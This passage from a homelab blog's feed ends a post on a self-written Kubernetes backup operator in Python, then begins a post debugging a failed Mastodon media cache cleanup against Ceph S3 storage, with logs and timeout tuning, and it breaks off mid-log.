<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_SCRATCH_VOL_DIR&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts/backup-s3-scratch&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_VOL_MOUNT_DIR&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_NAME&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;backup-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_NS&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_CONFIG&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts/hlsb-conf.yaml&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span></code></pre></div><p>These provide convenient access to the S3 scratch volume, which is used by
rclone for downloading an entire S3 bucket, which is then backed up by restic.
The HLSB&rsquo;s name and namespace also ended up being convenient to have available
in the Pod, if only for some meaningful log outputs. And finally it&rsquo;s nice to
have the path to the config file available as well.</p>
<p>And that&rsquo;s it - that&rsquo;s the entire Job. I&rsquo;ve long thought about providing some
code snippets used for creating the <a href="https://kubernetes-asyncio.readthedocs.io/en/latest/kubernetes_asyncio.client.models.v1_job.html">V1Job</a>,
but honestly, it&rsquo;s just not very interesting. It took me a while to get right,
but in the end it was all just value assignments.
Here&rsquo;s an example, the function which creates the Pod Volume spec for the
scratch volume:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">create_s3_scratch_volume</span>(backup_conf_spec):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;scratchVol&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> backup_conf_spec:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>error(<span style="color:#e6db74">&#34;Did not find scratchVol in backup config.&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    pvc <span style="color:#f92672">=</span> V1PersistentVolumeClaimVolumeSource(
</span></span><span style="display:flex;"><span>        claim_name<span style="color:#f92672">=</span>backup_conf_spec[<span style="color:#e6db74">&#34;scratchVol&#34;</span>], read_only<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)
</span></span><span style="display:flex;"><span>    volume <span style="color:#f92672">=</span> V1Volume(name<span style="color:#f92672">=</span>S3_SCRATCH_VOL_NAME,
</span></span><span style="display:flex;"><span>                      persistent_volume_claim<span style="color:#f92672">=</span>pvc)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> volume
</span></span></code></pre></div><p>The <code>backup_conf_spec</code> here is the <code>spec.serviceBackup</code> object from the
HomelabBackupConfig I&rsquo;ve shown above. And the rest of the roughly 630 lines it
took me to create the V1Job programmatically look very similar, perhaps
with the occasional <code>if</code> thrown in, but mostly just value assignments and logs.</p>
<p>And because I&rsquo;m a kind man, I will spare you all of it.</p>
<p>But I still want to show you some code I think could be interesting, so let&rsquo;s
jump to the Job execution.</p>
<h3 id="job-execution">Job execution</h3>
<p>The Job itself will get submitted via the Python API again, nothing special
here. But what is special: The current daemon (Kopf&rsquo;s nomenclature for a long
running change handler that doesn&rsquo;t just run to completion for a specific event)
needs to know the current Job has finished, in whatever way. For this I decided
to make use of the fact that I was writing asyncronous code. So while the
daemon waited for the Job to finish, it should yield. And luckily, Kopf
already provides a way to watch events from any k8s object type you might
be interested in. So I set up a watcher for events from Jobs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.event</span>(<span style="color:#e6db74">&#39;jobs&#39;</span>, labels<span style="color:#f92672">=</span>{<span style="color:#e6db74">&#39;homelab/part-of&#39;</span>: <span style="color:#e6db74">&#39;hlsb&#39;</span>})
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">job_event_handler</span>(type, status, labels, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    jobs<span style="color:#f92672">.</span>handle_job_events(type, status, labels)
</span></span></code></pre></div><p>This filters for the events of all Jobs with the <code>homelab/part-of: hlsb</code> label.</p>
<p>The actual handling of events then happens in this function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">handle_job_events</span>(type, status, labels):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> type <span style="color:#f92672">in</span> [<span style="color:#e6db74">&#34;None&#34;</span>, <span style="color:#e6db74">&#34;DELETED&#34;</span>, <span style="color:#66d9ef">None</span>]:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>debug(
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Ignored job event:</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">Status: </span><span style="color:#e6db74">{</span>status<span style="color:#e6db74">}</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">Labels: </span><span style="color:#e6db74">{</span>labels<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;hlsb&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> labels:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>error(
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;Got event without hlsb label:&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">Status: </span><span style="color:#e6db74">{status}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">Labels: </span><span style="color:#e6db74">{labels}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>        ns, name <span style="color:#f92672">=</span> labels[<span style="color:#e6db74">&#34;hlsb&#34;</span>]<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#34;_&#34;</span>)
</span></span><span style="display:flex;"><span>        job_state <span style="color:#f92672">=</span> get_job_state(status)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> job_state <span style="color:#f92672">in</span> [JobState<span style="color:#f92672">.</span>COMPLETE, JobState<span style="color:#f92672">.</span>FAILED]:
</span></span><span style="display:flex;"><span>            logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Found finished job for </span><span style="color:#e6db74">{</span>ns<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>            set_job_finished_event(ns, name)
</span></span></code></pre></div><p>This function only concerns itself with failed or completed jobs. And if it
finds such a job, it sets a &ldquo;Job finished&rdquo; event. These events are part of the
Python standard library&rsquo;s async synchronization primitives, see <a href="https://docs.python.org/3/library/asyncio-sync.html#asyncio.Event">here</a>.
They&rsquo;re awaitable objects, where the coroutine waiting on an event can be
woken up by executing the <code>event.set</code> method. And that&rsquo;s what happens in the
<code>set_job_finished_event</code> function called when the Job has been detected as
finished.</p>
<p>So how to determine whether a k8s Job has finished, failed or is still running?
Took me a while to figure out, but the safest way seems to be to look at the
<code>Job.status.conditions</code> array. If the <code>status</code> doesn&rsquo;t have that member at all,
it&rsquo;s a pretty good bet that the Job is running or pending.
Then you can iterate over the conditions, and if the given condition has <code>type</code>
<code>Failed</code> and <code>status</code> <code>True</code>, the job has failed. Same if <code>type</code> is <code>Complete</code>
and <code>status</code> is still <code>True</code>. Here&rsquo;s an example:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;conditions&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> [
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;lastProbeTime&#34;</span>: <span style="color:#e6db74">&#34;2025-01-10T01:30:23Z&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;lastTransitionTime&#34;</span>: <span style="color:#e6db74">&#34;2025-01-10T01:30:23Z&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;status&#34;</span>: <span style="color:#e6db74">&#34;True&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;Complete&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>And here&rsquo;s how that looks in Python:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_job_state</span>(job_status):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;conditions&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> job_status <span style="color:#f92672">or</span> <span style="color:#f92672">not</span> job_status[<span style="color:#e6db74">&#34;conditions&#34;</span>]:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> JobState<span style="color:#f92672">.</span>RUNNING
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> cond <span style="color:#f92672">in</span> job_status[<span style="color:#e6db74">&#34;conditions&#34;</span>]:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> cond[<span style="color:#e6db74">&#34;type&#34;</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;Failed&#34;</span> <span style="color:#f92672">and</span> cond[<span style="color:#e6db74">&#34;status&#34;</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;True&#34;</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">return</span> JobState<span style="color:#f92672">.</span>FAILED
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">elif</span> cond[<span style="color:#e6db74">&#34;type&#34;</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;Complete&#34;</span> <span style="color:#f92672">and</span> cond[<span style="color:#e6db74">&#34;status&#34;</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;True&#34;</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">return</span> JobState<span style="color:#f92672">.</span>COMPLETE
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> JobState<span style="color:#f92672">.</span>RUNNING
</span></span></code></pre></div><h2 id="conclusion">Conclusion</h2>
<p>And that&rsquo;s it. To be completely honest, this is the third time I&rsquo;m typing this
conclusion, and I almost <code>rm -rf</code>&rsquo;d this post multiple times. I don&rsquo;t think
it&rsquo;s that good or engaging. It seems I&rsquo;m just not that good at writing programming
blog posts. I hope those of you who made it to this point still got something
out of it.</p>
<p>So, time to do a recap: What did this bring me? And was it a good idea?
It all started out with my burning wish to just copy+paste my backup mechanism
from Nomad to Kubernetes, more-or-less verbatim. Add to that the fact that I
don&rsquo;t get to do much programming at $dayjob, and I was just missing it a bit.
Honestly, if someone were to ask me &ldquo;What&rsquo;s your most-used programming language?&rdquo;,
my honest answer would need to be &ldquo;Whatever Atlassian calls JIRA&rsquo;s markup language.&rdquo;</p>
<p>But I also learned quite a bit. I had never really worked with the k8s API
before, and this was a good way to dive deeper into it. Although I&rsquo;m not really
convinced that possessing the knowledge that writing small operators is something
I&rsquo;m able to do isn&rsquo;t just a tad bit dangerous. &#x1f62c;</p>
<p>My first commit to the repo was on May 9th, 2024. Adding it all up, this took
me nine months to do. With rather long interruptions at times, but most of those
were more due to motivation than anything else. If I had just used something
existing, I would have the k8s migration done by now. But where&rsquo;s the fun in
that?</p>
<p>There&rsquo;s still a lot I would like to refactor in the implementation. For example,
those of you who know the k8s API probably wondered why I went with async events
instead of just creating a &ldquo;watch&rdquo; on the Jobs and waiting for them to finish via that? I&rsquo;m
honestly not sure. But I would like to dive into k8s API watches.
Then there&rsquo;s the UT code. There&rsquo;s so much repeating myself in those tests,
and especially the mocks. Then there&rsquo;s still a lot of hardcoded constants in
the code I&rsquo;d like to make configurable via the HomelabBackupConfig or
HomelabServiceBackup.
And finally, there&rsquo;s also my wish to finally go and learn Golang. With this
operator, I&rsquo;ve got a really good-sized first project. And I would have the
advantage that it&rsquo;s not a greenfield project. Most of the design is already done,
so I would be able to concentrate on writing Go.</p>
<p>I will write one more post on the operator, as part of the Nomad to k8s series,
treating it as just another app and describing what the deployment looks like.</p>
<p>And finally, I&rsquo;m quite happy that I&rsquo;m done with this now. I&rsquo;ve been looking
forward to being able to continue the k8s migration for way too long.</p>
<p>My longing for continuing the migration has been getting so bad that I&rsquo;ve started
to miss YAML.</p>
<p>Almost.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Cleaning up my Mastodon Media Cache</title>
      <link>https://blog.mei-home.net/posts/mastodon-media-cache-cleanup-issue/</link>
      <pubDate>Wed, 27 Nov 2024 00:01:23 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/mastodon-media-cache-cleanup-issue/</guid>
      <description>Mastodon is actually innocent</description>
      <content:encoded><![CDATA[<p>I recently randomly wandered onto the Mastodon admin page. What I saw there
will shock you.</p>
<p>(I&rsquo;m so sorry about that introduction)</p>
<figure>
    <img loading="lazy" src="space-usage.png"
         alt="A screenshot of the SPACE USAGE section of the Mastodon admin dashboard. It shows the Postgres DB at 1.75 GB, Redis at 27.8 MB and the media storage at 447 GB."/> <figcaption>
            <p>That&rsquo;s perhaps a bit much in the Media storage area for a single user instance.</p>
        </figcaption>
</figure>

<p>I was pretty sure that I had previously configured Mastodon&rsquo;s media cache
retention to 7 days. Checking up on that, I found that I had remembered correctly.</p>
<p>So I dug a bit deeper, and it turns out that the Vacuum failed. If you&rsquo;d like
to check in your own logs, search the Sidekiq logs for <code>Vacuum</code>:</p>
<pre tabindex="0"><code>2024-09-01T05:35:00.024Z pid=7 tid=3dwb INFO: queueing Scheduler::VacuumScheduler (vacuum_scheduler)
E, [2024-09-01T05:35:15.395684 #7] ERROR -- : Error while running Vacuum::MediaAttachmentsVacuum: Net::ReadTimeout with #&lt;TCPSocket:(closed)&gt;
2024-09-01T05:36:49.666Z pid=7 tid=1bhhb class=Scheduler::VacuumScheduler jid=eb78e67fb9d775c1cac1e187 elapsed=109.631 INFO: done
</code></pre><p>These log lines repeated every day. There hasn&rsquo;t been a single successful run
in months, leading to 477 GB of media files. After some googling, I ended up
with the idea that this might be due to the batch size that Mastodon uses by
default for these delete requests to S3. So I reduced it to 100, from the default 1000.</p>
<p>This also failed, with the same log output. So I decided to look a bit closer
at my media storage, which is in an S3 bucket on my Homelab&rsquo;s Ceph storage
cluster. Looking at the RGW S3 daemons in my cluster, I found these log lines:</p>
<pre tabindex="0"><code>2024-10-19T03:32:31.269+0000 7f825e354700  1 ====== starting new request req=0x7f8161159660 =====
2024-10-19T03:32:36.273+0000 7f8166965700  1 req 1601675399780187004 5.004083157s op-&gt;ERRORHANDLER: err_no=-2 new_err_no=-2
2024-10-19T03:32:36.273+0000 7f8166965700  1 ====== req done req=0x7f8161159660 op status=-2 http_status=404 latency=5.004083157s ======
2024-10-19T03:32:36.273+0000 7f8166965700  1 beast: 0x7f8161159660: 260.0.0.10 - mastodon [19/Oct/2024:03:32:31.269 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=5.004083157s
</code></pre><p>And many more like them.</p>
<h2 id="detour-mastodon-media-cache-cleanup-implementation">Detour: Mastodon media cache cleanup implementation</h2>
<p>Let&rsquo;s do a short detour and look at what exactly this vacuum job does with
S3 based storage.
The interesting part of the code can be found in the <a href="https://github.com/mastodon/mastodon/blob/v4.3.0/app/lib/attachment_batch.rb">app/lib/attachment_batch.rb</a>
file. The relevant part for this discussion is this one:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-ruby" data-lang="ruby"><span style="display:flex;"><span><span style="color:#75715e"># We can batch deletes over S3, but there is a limit of how many</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># objects can be processed at once, so we have to potentially</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># separate them into multiple calls.</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>retries <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>keys<span style="color:#f92672">.</span>each_slice(<span style="color:#66d9ef">LIMIT</span>) <span style="color:#66d9ef">do</span> <span style="color:#f92672">|</span>keys_slice<span style="color:#f92672">|</span>
</span></span><span style="display:flex;"><span>  logger<span style="color:#f92672">.</span>debug { <span style="color:#e6db74">&#34;Deleting </span><span style="color:#e6db74">#{</span>keys_slice<span style="color:#f92672">.</span>size<span style="color:#e6db74">}</span><span style="color:#e6db74"> objects&#34;</span> }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  bucket<span style="color:#f92672">.</span>delete_objects(<span style="color:#e6db74">delete</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">objects</span>: keys_slice<span style="color:#f92672">.</span>map { <span style="color:#f92672">|</span>key<span style="color:#f92672">|</span> { <span style="color:#e6db74">key</span>: key } },
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">quiet</span>: <span style="color:#66d9ef">true</span>,
</span></span><span style="display:flex;"><span>  })
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">rescue</span> <span style="color:#f92672">=&gt;</span> e
</span></span><span style="display:flex;"><span>  retries <span style="color:#f92672">+=</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> retries <span style="color:#f92672">&lt;</span> <span style="color:#66d9ef">MAX_RETRY</span>
</span></span><span style="display:flex;"><span>    logger<span style="color:#f92672">.</span>debug <span style="color:#e6db74">&#34;Retry </span><span style="color:#e6db74">#{</span>retries<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">#{</span><span style="color:#66d9ef">MAX_RETRY</span><span style="color:#e6db74">}</span><span style="color:#e6db74"> after </span><span style="color:#e6db74">#{</span>e<span style="color:#f92672">.</span>message<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    sleep <span style="color:#ae81ff">2</span><span style="color:#f92672">**</span>retries
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">retry</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>    logger<span style="color:#f92672">.</span>error <span style="color:#e6db74">&#34;Batch deletion from S3 failed after </span><span style="color:#e6db74">#{</span>e<span style="color:#f92672">.</span>message<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">raise</span> e
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">end</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">end</span>
</span></span></code></pre></div><p>What happens here is Mastodon using the <a href="https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteObjects.html">DeleteObjects</a>
S3 API. With this API, you don&rsquo;t delete one object per request, but instead
send over an XML document with all of the paths to be deleted in a single
request.</p>
<p>The size of the batches is configurable with the <code>S3_BATCH_DELETE_LIMIT</code> variable.
The number of retries for a failed delete can be set in turn with <code>S3_BATCH_DELETE_RETRY</code>.</p>
<h2 id="trial-and-error">Trial and error</h2>
<p>Looking more closely at those log lines, I found specifically the last one
pretty interesting:</p>
<pre tabindex="0"><code>2024-10-19T03:32:36.273+0000 7f8166965700  1 beast: 0x7f8161159660: 10.86.5.129 - mastodon [19/Oct/2024:03:32:31.269 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=5.004083157s
</code></pre><p>Namely that the latency is given as (almost) 5 seconds. Triggering the vacuum
job several more times, I found that the latency stayed the same: Around 5
seconds for every failed request. At the same time, Mastodon&rsquo;s logs were talking
about a read timeout:</p>
<pre tabindex="0"><code>E, [2024-09-01T05:35:15.395684 #7] ERROR -- : Error while running Vacuum::MediaAttachmentsVacuum: Net::ReadTimeout with #&lt;TCPSocket:(closed)&gt;
</code></pre><p>So looking around a bit, I found the <code>S3_READ_TIMEOUT</code> variable in Mastodon.</p>
<blockquote>
<p>Default: 5 (seconds)</p>
<p>The number of seconds before the HTTP handler should timeout while waiting for an HTTP response.</p></blockquote>
<p>That default of 5 seconds fits the 5 second latency from the S3 RadosGW logs
perfectly. So I increased that value to 600 seconds. Because honestly, I
didn&rsquo;t really care how long it took, as long as it finished before the next
run of the Vacuum job.</p>
<p>But this was also unsuccessful, with RadosGW timing out the request this
time around.</p>
<p>I then decided to turn to the <code>tootctl</code> tool&rsquo;s <a href="https://docs.joinmastodon.org/admin/tootctl/#media-remove">media remove</a>
command, with the following invocation at first:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>tootctl media remove --days <span style="color:#ae81ff">7</span>
</span></span></code></pre></div><p>And this worked like a charm. I mean, almost. It crashed the Sidekiq container
I ran it in several times via OOM, until I created a separate container and provided
it with 4 GB of RAM.
The effect of those invocations can be seen in the post&rsquo;s cover image. I
initially deleted about 150k objects, followed by another whopping 900k objects.
Note: These are RADOS objects in the Ceph cluster, which do not necessarily have
a 1:1 relationship to S3 objects.
But still. My Mastodon media cache accidentally took up pretty much 50% of my
cluster&rsquo;s overall RADOS objects at that time. And that cluster also houses my
considerable media collection, digitized documents, podcasts and so on and so
forth.</p>
<figure>
    <img loading="lazy" src="object-changes.png"
         alt="A screenshot of a Grafana time series plot titled &#39;Object count changes by pool&#39;. It shows time on the X axis and RADOS object count changes per minute on the Y axis. The plot starts out vacillating a bit around 0 changes. Then on October 19th, 20:00, 500 objects are deleted per minute. With a couple of places where the plot returns to around 0 object changes, this holds until 02:30 on October 20th. The plot returns back to around zero for a while, until it goes down to about 950 deleted objects per minute from October 20th 10:00 to 21:15 on that same day."/> <figcaption>
            <p>The object change graph of my Ceph cluster. It clearly shows that it can easily handle about 1k deletes per minute.</p>
        </figcaption>
</figure>

<p>The above graph shows the problem: My Ceph cluster can easily delete almost 1k
objects per minute. That it should take five seconds to delete 100 and, in a
later test, 10, is ridiculous.</p>
<p>The big difference between <code>tootctl media remove</code> and what the Vacuum job does
lies in which S3 APIs they use. As I&rsquo;ve mentioned above, the Vacuum job uses
the DeleteObjects API and runs into some sort of issue, running into Masto&rsquo;s
read timeout.
<code>tootctl media remove</code>, on the other hand, sends DELETE requests:</p>
<pre tabindex="0"><code>2024-10-19T18:32:55.170+0000 7fa90b9df700  1 ====== starting new request req=0x7fa9c4a52660 =====
2024-10-19T18:32:55.178+0000 7fa90b9df700  1 ====== req done req=0x7fa9c4a52660 op status=0 http_status=200 latency=0.008000003s ======
2024-10-19T18:32:55.178+0000 7fa90b9df700  1 beast: 0x7fa9c4a52660: 260.0.0.10 - mastodon [19/Oct/2024:18:32:55.170 +0000] &#34;HEAD /mastodon/cache/media_attachments/files/111/526/742/001/415/010/small/d73862fc1c5188e0.jpg HTTP/1.1&#34; 200 0 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,B,N&#34; - latency=0.008000003s
2024-10-19T18:32:55.190+0000 7fa8968f5700  1 ====== starting new request req=0x7fa9c4a52660 =====
2024-10-19T18:32:55.246+0000 7fa935232700  1 ====== req done req=0x7fa9c4a52660 op status=0 http_status=204 latency=0.056000017s ======
2024-10-19T18:32:55.246+0000 7fa935232700  1 beast: 0x7fa9c4a52660: 260.0.0.10 - mastodon [19/Oct/2024:18:32:55.190 +0000] &#34;DELETE /mastodon/cache/media_attachments/files/111/526/742/001/415/010/original/d73862fc1c5188e0.jpg HTTP/1.1&#34; 204 0 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=0.056000017s
</code></pre><p>Interestingly, if I take the latency of that delete - 0.5 seconds, times 100
requests, I end up with the problematic 5 second S3 read timeout the Vacuum job
is hitting.
But sadly, this is not the problem. Because I also tried the Vacuum job with a
batch size of 10 and got the same results. Which is ridiculous, as the
graph above shows: The cluster can indeed handle roughly 1k requests per minute.</p>
<p>Next, I decided to reduce the batch size to 1 and increase the <code>S3_READ_TIMEOUT</code>
to 60 seconds. With that, I got a mix of results, which is even weirder. First
of all, I had not a single failure in the large number of DELETE requests that
<code>tootctl media remove</code> send, and I wasn&rsquo;t doing anything really different here -
just using a different API. But the results were still a mix of 404 after the
60 second read timeout, and successful runs:</p>
<pre tabindex="0"><code>2024-10-26T07:22:09.199+0000 7fb404aae700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:22:08.123 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.076018214s
2024-10-26T07:23:59.137+0000 7fb404aae700  1 beast: 0x7fb3ce13e660: 260.0.0.10 - mastodon [26/Oct/2024:07:23:58.053 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.084018350s
2024-10-26T07:33:02.526+0000 7fb479397700  1 beast: 0x7fb3ce03c660: 260.0.0.10 - mastodon [26/Oct/2024:07:32:02.453 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.073013306s
2024-10-26T07:34:04.623+0000 7fb426af2700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:33:04.562 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.061012268s
